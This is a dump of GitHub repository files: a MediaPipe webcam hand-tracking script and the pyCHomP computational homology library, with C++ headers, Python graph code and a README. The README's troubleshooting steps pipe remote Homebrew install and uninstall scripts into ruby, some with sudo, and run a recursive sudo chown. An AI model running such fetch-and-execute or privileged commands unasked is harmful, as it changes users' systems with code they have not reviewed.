"repo_name": "Sompus/Hand-tracker-",
"src_encoding": "UTF-8",
"text": "import mediapipe as mp\r\nimport cv2\r\nimport numpy as np\r\nimport uuid\r\nimport os\r\n\r\nmp_drawing = mp.solutions.drawing_utils\r\nmp_hands = mp.solutions.hands\r\n\r\ncap = cv2.VideoCapture (0)\r\n\r\nwith mp_hands.Hands (min_detection_confidence = 0.8, min_tracking_confidence = 0.5) as hands :\r\n while cap.isOpened () :\r\n ret, frame = cap.read ()\r\n\r\n image = cv2.cvtColor (frame, cv2.COLOR_BGR2RGB)\r\n\r\n image = cv2.flip (image, 1)\r\n\r\n image.flags.writeable = False\r\n \r\n results = hands.process (image)\r\n\r\n image.flags.writeable = True\r\n\r\n image = cv2.cvtColor (image, cv2.COLOR_RGB2BGR)\r\n\r\n print (results)\r\n\r\n if results.multi_hand_landmarks :\r\n for num, hand in enumerate (results.multi_hand_landmarks) :\r\n mp_drawing.draw_landmarks (image, hand, mp_hands.HAND_CONNECTIONS,\r\n mp_drawing.DrawingSpec (color = (121, 22, 76), thickness = 2,\r\n circle_radius = 4),\r\n mp_drawing.DrawingSpec (color = (250, 44, 250), thickness = 2,\r\n circle_radius = 2),\r\n )\r\n\r\n cv2.imshow ('Traker', image)\r\n\r\n if cv2.waitKey (10) & 0xFF == ord ('q') :\r\n break\r\n\r\ncap.release ()\r\ncv2.destroyAllWindows ()\r\n\r\nmp_drawing.DrawingSpec\r\n\r\nos.mkdir('Output Images')\r\n\r\ncap = cv2.VideoCapture (0)\r\n\r\nwith mp_hands.Hands (min_detection_confidence = 0.8, min_tracking_confidence = 0.5) as hands :\r\n while cap.isOpened () :\r\n ret, frame = cap.read ()\r\n\r\n image = cv2.cvtColor (frame, cv2.COLOR_BGR2RGB)\r\n\r\n image = cv2.flip (image, 1)\r\n\r\n image.flags.writeable = False\r\n\r\n results = hands.process (image)\r\n\r\n image.flags.writeable = True\r\n\r\n image = cv2.cvtColor (image, cv2.COLOR_RGB2BGR)\r\n\r\n print (results)\r\n\r\n if results.multi_hand_landmarks :\r\n for num, hand in enumerate (results.multi_hand_landmarks) :\r\n mp_drawing.draw_landmarks (image, hand, mp_hands.HAND_CONNECTIONS,\r\n mp_drawing.DrawingSpec (color = (50, 205, 50), thickness = 2, #You can change the colors if you want, check for code \"https://flaviocopes.com/rgb-color-codes/\"\r\n circle_radius = 3),\r\n mp_drawing.DrawingSpec (color = (0, 206, 209), thickness = 2,\r\n circle_radius = 2),\r\n )\r\n\r\n cv2.imwrite (os.path.join ('Output Images', '{}.jpg'.format (uuid.uuid1 ())), image)\r\n cv2.imshow ('Tracker', image)\r\n\r\n if cv2.waitKey (10) & 0xFF == ord ('q') :\r\n break\r\n\r\ncap.release ()\r\ncv2.destroyAllWindows ()\r\n"
},
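To go beyond drawing and read coordinates out of the tracked hands (e.g. for gesture logic), each `hand` in the loops above carries 21 normalized landmarks. A sketch of extracting the index fingertip, assuming mediapipe's `solutions` interface as used in the script:

```python
# inside: for num, hand in enumerate (results.multi_hand_landmarks) :
tip = hand.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP]
h, w, _ = image.shape
px, py = int(tip.x * w), int(tip.y * h)          # normalized [0, 1] -> pixel coordinates
cv2.circle(image, (px, py), 8, (0, 0, 255), -1)  # mark the fingertip in red (BGR)
```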
{
"alpha_fraction": 0.80402010679245,
"alphanum_fraction": 0.80402010679245,
"avg_line_length": 23.75,
"blob_id": "55c9a999c0db646753cf867e034213c48f7079fd",
"content_id": "69a8087c88f29153fec3017cd0dd122314444972",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 244,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 8,
"path": "/README.md",
"repo_name": "Sompus/Hand-tracker-",
"src_encoding": "UTF-8",
"text": "# Hand-tracker- For fun\n\nПеред тем как начать работу пропишите в терминале это:\npip install mediapipe opencv-python\n\n\nBefore starting write this in the terminal:\npip install mediapipe opencv-python\n\n"
}
] | 2 |
shaunharker/pyCHomP | https://github.com/shaunharker/pyCHomP | 3731a78f63c6d2845d4b39b20e17358760741111 | 2c5a0e6ea5f1da107bbf20c09a2194aa0fbaf6db | c4b817f756f2f00fc145d9c82b40ed8055989016 | refs/heads/master | 2021-07-03T19:19:41.618107 | 2019-04-10T18:30:43 | 2019-04-10T18:30:43 | 109,848,079 | 5 | 8 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7376573085784912,
"alphanum_fraction": 0.7550823092460632,
"avg_line_length": 22.477272033691406,
"blob_id": "33d4dc87c5543225ed3b766eae1958f4de6325df",
"content_id": "c80a8dfbaa0e62f2825414b67ba0c3c247d8250f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1033,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 44,
"path": "/src/pychomp/_chomp/chomp.cpp",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// chompy.cpp\n/// Shaun Harker\n/// 2017-07-20\n/// MIT LICENSE\n\n#include \"Integer.h\"\n#include \"Iterator.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"CubicalComplex.h\"\n#include \"MorseComplex.h\"\n#include \"MorseMatching.h\"\n#include \"MorseMatching.hpp\"\n#include \"CubicalMorseMatching.h\"\n#include \"GenericMorseMatching.h\"\n#include \"Homology.h\"\n#include \"GradedComplex.h\"\n#include \"MorseGradedComplex.h\"\n#include \"ConnectionMatrix.h\"\n#include \"Grading.h\"\n#include \"SimplicialComplex.h\"\n#include \"OrderComplex.h\"\n#include \"DualComplex.h\"\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\nPYBIND11_MODULE( _chomp, m) {\n ComplexBinding(m);\n CubicalComplexBinding(m);\n MorseMatchingBinding(m);\n CubicalMorseMatchingBinding(m);\n GenericMorseMatchingBinding(m);\n MorseComplexBinding(m);\n HomologyBinding(m);\n GradedComplexBinding(m);\n MorseGradedComplexBinding(m);\n ConnectionMatrixBinding(m);\n GradingBinding(m);\n SimplicialComplexBinding(m);\n OrderComplexBinding(m);\n DualComplexBinding(m);\n}\n"
},
{
"alpha_fraction": 0.5600528120994568,
"alphanum_fraction": 0.5666519999504089,
"avg_line_length": 29.70270347595215,
"blob_id": "76cadb28d09a2831f94fb4c6c0b9c3a9bb40432b",
"content_id": "87a67e751e89ce3100be82e5349554417adeeb83",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2273,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 74,
"path": "/src/pychomp/StronglyConnectedComponents.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "### StronglyConnectedComponents.py\n### MIT LICENSE 2016 Shaun Harker\n\ndef StronglyConnectedComponents(vertices_input, adjacencies_input):\n \"\"\"\n Overview:\n Compute the strongly connected components.\n Inputs:\n vertices_input : a collection of vertices\n adjacencies_input : a function which takes a vertex and gives the adjacency list\n \"\"\"\n\n # We translate the vertices to contiguous integers\n # via a list \"vertices\" and a dictionary \"numbering\"\n vertices = list(vertices_input)\n N = len(vertices)\n numbering = { v : i+1 for i, v in enumerate(vertices) }\n\n # We wrap the adjacencies list to use our contiguous integer indexing\n def Adjacencies(v):\n vertex = vertices[v-1]\n return [ numbering[u] for u in adjacencies_input(vertex)]\n\n # Data structures\n DFS = []\n S = []\n LOWLINK = [0] # dummy sentinel\n result = []\n index = {}\n explored = set() #TODO, use array\n committed = set() #TODO, use array\n n = [0] # language caveat note: using list of one integer to capture variable and assign to it in \"preorder\" \n # Preorder step \n def preorder(v):\n if v in explored:\n return\n DFS.append(-v)\n explored.add(v)\n link = n[0]\n index[v] = link\n n[0] += 1\n for u in Adjacencies(v):\n if u not in explored:\n DFS.append(u)\n elif u not in committed:\n link = min(link, index[u])\n LOWLINK.append(link)\n S.append(v)\n\n # Postorder step \n def postorder(v):\n lowlink = LOWLINK.pop()\n if lowlink == index[v]:\n SCC = []\n while v not in committed: #out of order? I had a do-while loop\n u = S.pop()\n SCC.append(u)\n committed.add(u)\n result.append(SCC)\n link = LOWLINK.pop()\n link = min(link, lowlink)\n LOWLINK.append(link)\n\n # Main routine\n DFS = list(range(1,N+1))\n while DFS:\n u = DFS.pop()\n if u > 0:\n preorder(u)\n else:\n postorder(-u)\n #Return result\n # Convert results to lists of vertices as originally given\n return [ [ vertices[v-1] for v in component ] for component in result ]\n\n"
},
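A minimal usage example for the function above, on a four-vertex digraph (graph data invented for illustration): vertices 1→2→3→1 form one cycle and 4 only points into it, so the components are {1, 2, 3} and {4}.

```python
graph = {1: [2], 2: [3], 3: [1], 4: [3]}
components = StronglyConnectedComponents(graph.keys(), lambda v: graph[v])
assert sorted(sorted(c) for c in components) == [[1, 2, 3], [4]]
```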
{
"alpha_fraction": 0.7389649748802185,
"alphanum_fraction": 0.7423896789550781,
"avg_line_length": 24.009523391723633,
"blob_id": "c18b3f7d3797d1ce8ede2f32e2cd170516f3da21",
"content_id": "3acdd35babc43aaed96c2574bcb3c0185e5377ad",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2628,
"license_type": "permissive",
"max_line_length": 334,
"num_lines": 105,
"path": "/README.md",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# pyCHomP\n\nCHomP (Computational Homology Project) with Python bindings\n\n## Installation\n\nTo get the latest tagged version from the PyPi repository:\n\n```bash\npip install pychomp\n```\n\nTo uninstall:\n\n```bash\npip uninstall pychomp\n```\n\n\n## Installing from source\n\nTo get the bleeding edge version (i.e., this repo):\n\n```bash\ngit clone https://github.com/shaunharker/pyCHomP.git\ncd pyCHomP\ngit submodule update --init --recursive\npip install . --ignore-installed --no-cache-dir -v -v -v --user\n```\n\n## Troubleshooting\n\n### Can't get it to work with your version of python\n\nTry Anaconda3 <https://www.anaconda.com>.\n\nThis will install into a folder named `anaconda3` and add a line in `~/.bash_profile`:\n\n```bash\n#added by Anaconda3 5.0.1 installer\n#export PATH=\"/PATH/TO/anaconda3/bin:$PATH\"\n```\n\nThis will redirect command line python and pip. Note you may have to start a new `bash` session for the path changes to take effect (i.e. close and reopen the terminal program). This has the effect of plastering over any problems you might be having with multiple installations/permissions problems/jupyter not seeing the package/etc.\n\nAfter installing this,\n\n```\npip install jupyter\n```\n\nand try the installation above again.\n\n### For macOS users who don't want anaconda but instead want to use `homebrew` python:\n\nIf the installation gives permissions issues, oftentimes the culprit is broken permissions on the subfolders of the homebrew folder `/usr/local`. \n\nFirst, see what\n\n```\nbrew doctor\n```\n\nsays. A common fix is:\n\n```\nsudo chown -R $(whoami) $(brew --prefix)/*\n```\n\nIf it still doesn't work after this, then you might try uninstalling and reinstalling homebrew.\n\nTo uninstall homebrew:\n\n```\nruby -e \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/uninstall)\"\n```\n\nOr `sudo` if it gives issues:\n\n```\nsudo ruby -e \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/uninstall)\"\n```\n\nTo install homebrew (don't use `sudo` here!):\n\n```\nruby -e \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)\"\n```\n\n### Python/Jupyter Integration issues:\n\nIf the package installs but it is not visible in jupyter, the likely problem is that the jupyter python kernel is not the same python for which pychomp was installed. That is, you may have multiple pythons on your system.\n\nYou can try to confirm this by typing\n\n```\nwhich python\nwhich pip\nwhich jupyter\n```\n\nPossible fixes include steps such as \n\n1. checking/changing your environmental variable `PATH` in `~/.bash_profile` or `.bashrc`\n2. uninstalling python and jupyter, then reinstalling python then jupyter\n\n\n"
},
{
"alpha_fraction": 0.6276223659515381,
"alphanum_fraction": 0.6520978808403015,
"avg_line_length": 18.724138259887695,
"blob_id": "8aeb5de34c56d6ee75e7882aff450e11c3b9e8d5",
"content_id": "f09219a38fe5b08eb01aa1c0d0ef5cfe46e600bd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 572,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 29,
"path": "/src/pychomp/_chomp/include/common.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "// common.h\n/// Shaun Harker 2017-01-25-2341\n/// MIT LICENSE\n\n#pragma once\n\n#include <iostream>\n#include <cstdint>\n#include <numeric>\n#include <memory>\n#include <fstream>\n#include <string>\n#include <vector>\n#include <unordered_set>\n#include <unordered_map>\n#include <algorithm>\n#include <functional>\n#include <queue>\n#include <limits>\n#include <stack>\n#include <iterator>\n#include \"hash.hpp\"\n\n// Debug\n\ninline void\nprint_vector (std::vector<uint64_t> const& v, std::string name) { \n std::cout << name << \" == [\"; for ( auto x : v ) std::cout << x << \",\"; std::cout << \"]\\n\";\n}\n"
},
{
"alpha_fraction": 0.7187322974205017,
"alphanum_fraction": 0.7277871966362,
"avg_line_length": 31.72222137451172,
"blob_id": "39fca96a52858279402cb807fd5b711dd2fd9d81",
"content_id": "7fa00084e09560017ae61c1edd6e47358dfbf236",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1767,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 54,
"path": "/src/pychomp/_chomp/include/MorseGradedComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// MorseGradedComplex.h\n/// Shaun Harker\n/// 2017-07-20\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n#include <vector>\n\n#include \"Integer.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"MorseComplex.h\"\n#include \"MorseMatching.h\"\n#include \"GradedComplex.h\"\n\n/// MorseGradedComplex\ninline\nstd::shared_ptr<GradedComplex> \nMorseGradedComplex ( std::shared_ptr<GradedComplex> base_graded_complex, \n std::shared_ptr<MorseMatching> matching ) {\n\n std::shared_ptr<MorseComplex> complex ( new MorseComplex(base_graded_complex -> complex(), matching) );\n\n // Convert indices of cells to compute new graded_complex mapping (map from cell index to poset vertex number)\n std::vector<Integer> graded_complex_mapping(complex -> size());\n for ( auto x : *complex ) {\n Chain included = complex -> include ({x});\n graded_complex_mapping[x]= base_graded_complex -> value(*included.begin());\n }\n\n return std::shared_ptr<GradedComplex>( new GradedComplex(complex, [=](Integer x){return graded_complex_mapping[x];}));\n}\n\n/// MorseGradedComplex\ninline\nstd::shared_ptr<GradedComplex> \nMorseGradedComplex ( std::shared_ptr<GradedComplex> base_graded_complex ) {\n std::shared_ptr<MorseMatching> matching ( MorseMatching::compute_matching(base_graded_complex) );\n return MorseGradedComplex (base_graded_complex, matching);\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline\nvoid MorseGradedComplexBinding(py::module &m) {\n m.def(\"MorseGradedComplex\", (std::shared_ptr<GradedComplex>(*)(std::shared_ptr<GradedComplex>,std::shared_ptr<MorseMatching>))&MorseGradedComplex);\n m.def(\"MorseGradedComplex\", (std::shared_ptr<GradedComplex>(*)(std::shared_ptr<GradedComplex>))&MorseGradedComplex);\n}\n"
},
{
"alpha_fraction": 0.5125628113746643,
"alphanum_fraction": 0.5237297415733337,
"avg_line_length": 29.355932235717773,
"blob_id": "12fa17e2f3de42ad514895c04df746d361766047",
"content_id": "369384941069d4530e2f8dbd4dc0792b64b9a68d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1791,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 59,
"path": "/src/pychomp/_chomp/include/Grading.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// Valuation.h\n/// Shaun Harker\n/// 2018-03-09\n/// MIT LICENSE\n\n#pragma once\n\n#include \"common.h\"\n\nstd::function<Integer(Integer)>\nconstruct_grading ( std::shared_ptr<Complex> c, \n std::function<Integer(Integer)> top_cell_grading ) {\n // Copy top_cell_grading (with offset)\n std::vector<Integer> top_cell_grading_;\n top_cell_grading_.resize(c->size(c->dimension()));\n Integer num_nontop_cells_ = c->size() - c->size(c->dimension());\n for ( auto v : (*c)(c->dimension()) ) {\n top_cell_grading_[v - num_nontop_cells_] = top_cell_grading(v);\n }\n return [=](Integer x) { \n // std::cout << \"grading function\\n\";\n // std::cout << \"top_cell_grading_.size() == \" << top_cell_grading_.size() << \"\\n\";\n // std::cout << \"c -> size() == \" << c -> size() << \"\\n\";\n Integer min_value = -1;\n // for ( auto v : *c ) {\n // std::cout << \"c -> topstar(v) .size() == \" << c ->topstar(v).size() << \"\\n\";\n // }\n // std::cout << \"grading of \" << x << \"\\n\";\n\n for ( auto v : c->topstar(x) ) {\n // std::cout << \" top cell \" << v << \"\\n\";\n // std::cout << \" minvalue = \" << min_value << \"\\n\";\n auto new_val = top_cell_grading_[v - num_nontop_cells_];\n // std::cout << \" new_val = \" << new_val << \"\\n\";\n if ( min_value == -1 ) {\n // std::cout << \" A\\n\";\n min_value = new_val;\n } else {\n // std::cout << \" B\\n\";\n min_value = std::min(min_value, new_val);\n }\n }\n // std::cout << \"returning. minvalue = \" << min_value << \"\\n\";\n return min_value;\n };\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\n#include <pybind11/functional.h>\n\nnamespace py = pybind11;\n\ninline void\nGradingBinding(py::module &m) {\n m.def(\"construct_grading\", &construct_grading);\n}\n"
},
{
"alpha_fraction": 0.5222392678260803,
"alphanum_fraction": 0.5360429286956787,
"avg_line_length": 20.37704849243164,
"blob_id": "a549561ddf87c98c4a0bcbc0fe55c1a4e7cf4591",
"content_id": "327362df5d920dfe5fd386e822cb2692e5e9cc19",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1304,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 61,
"path": "/src/pychomp/_chomp/include/Chain.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// Chain.h\n/// Shaun Harker\n/// 2017-07-19\n/// MIT LICENSE\n\n#pragma once\n\n#include <unordered_set>\n#include <iostream>\n\n#include \"Integer.h\"\n\ntypedef std::unordered_set<Integer> Chain; \n\ninline void \noperator += ( Chain& lhs, Integer rhs ) { \n if ( lhs.count(rhs) ) lhs.erase(rhs); else lhs.insert(rhs);\n}\n\ninline void \noperator += ( Chain& lhs, Chain const& rhs ) {\n for ( auto x : rhs ) lhs += x;\n}\n\ninline Chain\noperator + ( Chain const& lhs, Chain const& rhs ) {\n Chain result;\n result += lhs;\n result += rhs;\n return result;\n}\n\ninline std::ostream &\noperator << ( std::ostream & outstream, Chain const& print_me ) {\n outstream << \"[\";\n for ( auto x : print_me ) outstream << x << \",\";\n outstream << \"]\";\n return outstream;\n}\n\n/// Python Bindings\n// Note: using default STL wrapper for Chain\n\n// #include <pybind11/pybind11.h>\n// #include <pybind11/stl.h>\n// namespace py = pybind11;\n//\n//\n// void ChainBinding(py::module &m) {\n// py::class_<Chain>(m, \"Chain\")\n// .def(py::init<>())\n// .def(py::init<std::vector<uint64_t> const&>())\n// .def(\"__str__\", )\n// .def(\"__repr__\", )\n// .def(\"__add__\", )\n// .def(\"__iadd__\", )\n// .def(\"__sub__\", )\n// .def(\"__isub__\", )\n// .def(\"__iter__\", )\n// .def(\"__len__\", ).\n// }\n"
},
{
"alpha_fraction": 0.5755584836006165,
"alphanum_fraction": 0.5860709547996521,
"avg_line_length": 25.241378784179688,
"blob_id": "6bf08df31652922939af81ffb8422dcee0fe48df",
"content_id": "ee88901ca25e8c16328fb1960698d2969292f1e3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 761,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 29,
"path": "/src/pychomp/InducedSubgraph.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# InducedSubgraph.py\n# Shaun Harker\n# MIT LICENSE\n# 2018-03-12\n\nfrom pychomp.DirectedAcyclicGraph import *\nfrom pychomp.Poset import *\n\ndef InducedSubgraph( G, predicate ):\n result = DirectedAcyclicGraph()\n S = set([v for v in G.vertices() if predicate(v)])\n for v in S:\n result.add_vertex(v)\n for v in S:\n for u in G.adjacencies(v):\n if u in S and u != v:\n result.add_edge(v,u)\n return result\n\ndef InducedPoset( G, predicate ):\n result = DirectedAcyclicGraph()\n S = set([v for v in G.vertices() if predicate(v)])\n for v in S:\n result.add_vertex(v)\n for v in S:\n for u in G.descendants(v):\n if u in S and u != v:\n result.add_edge(v,u)\n return Poset(result)\n"
},
{
"alpha_fraction": 0.7198067903518677,
"alphanum_fraction": 0.7198067903518677,
"avg_line_length": 33.5,
"blob_id": "8ed51d6e75e92d50fb9f7cd95362e2331cff978b",
"content_id": "f52304794e926596b31437e9353845987db6778b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 207,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 6,
"path": "/install.sh",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# installer script\nrm -rf build\nrm -rf dist\ngit submodule update --init --recursive\n#pip install . --ignore-installed --no-cache-dir\npip install . --upgrade --no-deps --force-reinstall --no-cache-dir --user\n"
},
{
"alpha_fraction": 0.686165988445282,
"alphanum_fraction": 0.7011857628822327,
"avg_line_length": 22.425926208496094,
"blob_id": "4b59ec982ae36914843adb19c086fa5e33ea6461",
"content_id": "a6dd21a109a4db1769b60a301331105851eda300",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1265,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 54,
"path": "/src/pychomp/_chomp/include/MorseMatching.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// MorseMatching.h\n/// Shaun Harker\n/// 2017-07-19\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n#include <unordered_set>\n#include <vector>\n\n#include \"Integer.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"GradedComplex.h\"\n\nclass MorseMatching {\npublic:\n typedef std::vector<Integer> BeginType; // To store location of first cell of each dim\n typedef std::vector<std::pair<Integer,Integer>> ReindexType; // To convert indexing\n\n /// mate\n virtual Integer mate ( Integer x ) const = 0;\n\n /// priority\n virtual Integer priority ( Integer x ) const = 0;\n\n /// critical_cells\n virtual std::pair<BeginType const&,ReindexType const&>\n critical_cells ( void ) const = 0;\n\n /// compute_matching\n static\n std::shared_ptr<MorseMatching>\n compute_matching ( std::shared_ptr<Complex> complex );\n\n /// compute_matching\n static\n std::shared_ptr<MorseMatching>\n compute_matching ( std::shared_ptr<GradedComplex> graded_complex );\n};\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nMorseMatchingBinding(py::module &m) {\n py::class_<MorseMatching, std::shared_ptr<MorseMatching>>(m, \"MorseMatching\") \n .def(\"mate\", &MorseMatching::mate)\n .def(\"priority\", &MorseMatching::priority);\n}\n"
},
{
"alpha_fraction": 0.3636363744735718,
"alphanum_fraction": 0.5090909004211426,
"avg_line_length": 12.5,
"blob_id": "b1e48cbdbb3abf96151b50c4ce6a277b992ef6a2",
"content_id": "95162b6d014f65b91a8418ff978e4e9542186c5a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 55,
"license_type": "permissive",
"max_line_length": 15,
"num_lines": 4,
"path": "/src/pychomp/_chomp/include/Poset.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// Poset.h\n/// Shaun Harker\n/// 2018-03-13\n/// MIT LICENSE\n\n"
},
{
"alpha_fraction": 0.7076685428619385,
"alphanum_fraction": 0.7112712264060974,
"avg_line_length": 36.36538314819336,
"blob_id": "db62534bb452f4ba8cc06652be006353ee542994",
"content_id": "b0a0a13c0f7e0244d42bc87a1f5d5e8b83870b98",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1943,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 52,
"path": "/src/pychomp/FlowGradedComplex.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "### FlowGradedComplex.py\n### MIT LICENSE 2016 Shaun Harker\n\nfrom pychomp._chomp import *\nfrom pychomp.CondensationGraph import *\nfrom pychomp.StronglyConnectedComponents import *\nfrom pychomp.DirectedAcyclicGraph import *\nfrom pychomp.Poset import *\n\ndef FlowGradedComplex(complex, discrete_flow):\n \"\"\"\n Overview:\n Given a complex and a graph on its top dimensional cells,\n produce a GradedComplex such that the preimage of a down set\n is the collection of cells in the closure of all the \n associated top cells\n Inputs:\n complex : a complex\n flow_graph : a function from vertices to out-adjacent vertices\n Algorithm:\n Apply strongly connected components algorithm and determine\n reachability relation among the strong components to learn\n a poset. Associated to each poset vertex is a collection of\n top cells. \n \"\"\"\n\n # Step 1. Compute the poset of strongly connected components\n \n vertices = [ cell for cell in complex(complex.dimension())]\n (dag, mapping) = CondensationGraph(vertices, discrete_flow)\n #poset = Poset(dag)\n\n # Step 2. Extend the mapping from top-cells to all cells\n # Basic idea: since the component indexing furnishes a linear\n # extension of the poset, we assign each cell to \n # the minimum indexed poset which contains a top cell\n # it is incident.\n\n\n # for cell in reversed(range(0,len(complex))):\n # current_value = mapping[cell]\n # for bd_cell in complex.boundary({cell}):\n # mapping[bd_cell] = min(mapping.get(bd_cell,current_value), current_value)\n\n #num_nontop_cells = complex.size() - complex.size(complex.dimension())\n\n #valuation = lambda x : min([mapping[z] for z in complex.star(x) if z >= num_nontop_cells])\n\n grading = construct_grading(complex, lambda x : mapping[x] );\n return dag, GradedComplex(complex, grading) # lambda x : mapping[x])\n\n #return poset, chompy.GradedComplex(complex, lambda x : mapping[x])\n"
},
{
"alpha_fraction": 0.5798554420471191,
"alphanum_fraction": 0.5861506462097168,
"avg_line_length": 23.095504760742188,
"blob_id": "e98f97765ba79754ac199f0c8793eaae4198d274",
"content_id": "4f59415fc921de5239fa45376724ed1951a9ff17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4289,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 178,
"path": "/src/pychomp/_chomp/include/Complex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// Complex.h\n/// Shaun Harker\n/// 2017-07-18\n/// MIT LICENSE\n\n#pragma once\n\n#include \"common.h\"\n\n#include \"Integer.h\"\n#include \"Iterator.h\"\n#include \"Chain.h\"\n\n/// Complex\nclass Complex {\npublic:\n\n /// virtual destructor\n virtual\n ~Complex ( void ) {}\n\n /// boundary\n virtual Chain\n boundary ( Chain const& chain ) const {\n Chain result;\n auto callback = [&](Integer bd_cell){result += bd_cell;};\n for ( auto x : chain ) column(x, callback);\n return result;\n }\n\n /// coboundary\n virtual Chain\n coboundary ( Chain const& chain ) const {\n Chain result;\n auto callback = [&](Integer bd_cell){result += bd_cell;};\n for ( auto x : chain ) row(x, callback);\n return result; \n }\n\n /// closure\n virtual std::unordered_set<Integer>\n closure ( std::unordered_set<Integer> cells ) const {\n std::unordered_set<Integer> result;\n std::stack<Integer> work_stack;\n for ( auto cell : cells) work_stack.push(cell);\n while ( not work_stack.empty() ) {\n auto v = work_stack.top();\n work_stack.pop();\n if ( result.count(v) ) continue;\n result.insert(v);\n for ( auto u : boundary({v}) ) {\n work_stack.push(u);\n }\n }\n return result;\n }\n\n /// star\n virtual std::unordered_set<Integer>\n star ( std::unordered_set<Integer> cells ) const {\n std::unordered_set<Integer> result;\n std::stack<Integer> work_stack;\n for ( auto cell : cells) work_stack.push(cell);\n while ( not work_stack.empty() ) {\n auto v = work_stack.top();\n work_stack.pop();\n if ( result.count(v) ) continue;\n result.insert(v);\n for ( auto u : coboundary({v}) ) {\n work_stack.push(u);\n }\n }\n return result;\n }\n\n /// topstar\n /// return top dimensional cells in star\n virtual std::vector<Integer>\n topstar ( Integer cell ) const {\n Integer N = size() - size(dimension());\n std::vector<Integer> result;\n for ( auto v : star({cell}) ) {\n if ( v >= N ) result.push_back(v);\n }\n return result;\n }\n\n /// column\n /// Apply \"callback\" method to every element in ith column of\n /// boundary matrix\n virtual void\n column ( Integer i, std::function<void(Integer)> const& callback) const {};\n\n /// row\n /// Apply \"callback\" method to every element in ith row of\n /// boundary matrix\n virtual void\n row ( Integer i, std::function<void(Integer)> const& callback) const {};\n \n /// dimension\n Integer \n dimension ( void ) const {\n return dim_;\n }\n\n /// begin\n Iterator\n begin ( void ) const {\n return begin_[0];\n }\n\n /// end\n Iterator\n end ( void ) const {\n return begin_.back();\n }\n\n /// size\n Integer\n size ( void ) const {\n return * begin_.back();\n }\n\n /// size\n Integer\n size ( Integer d ) const {\n if ( d < 0 || d > dim_ ) return 0;\n return begin_[d+1] - begin_[d];\n }\n\n /// operator ()\n Range\n operator () ( Integer dim ) const {\n return Range(begin_[dim], begin_[dim+1]);\n }\n\n /// count\n std::vector<Integer>\n count ( void ) const {\n std::vector<Integer> result;\n auto D = dimension ();\n for ( Integer d = 0; d <= D; ++ d ) result.push_back(size(d));\n return result;\n }\n\nprotected:\n Integer dim_;\n std::vector<Iterator> begin_; // begin_by_dim_[D+1] == size_;\n};\n\n/// Python Bindings\n\n#include 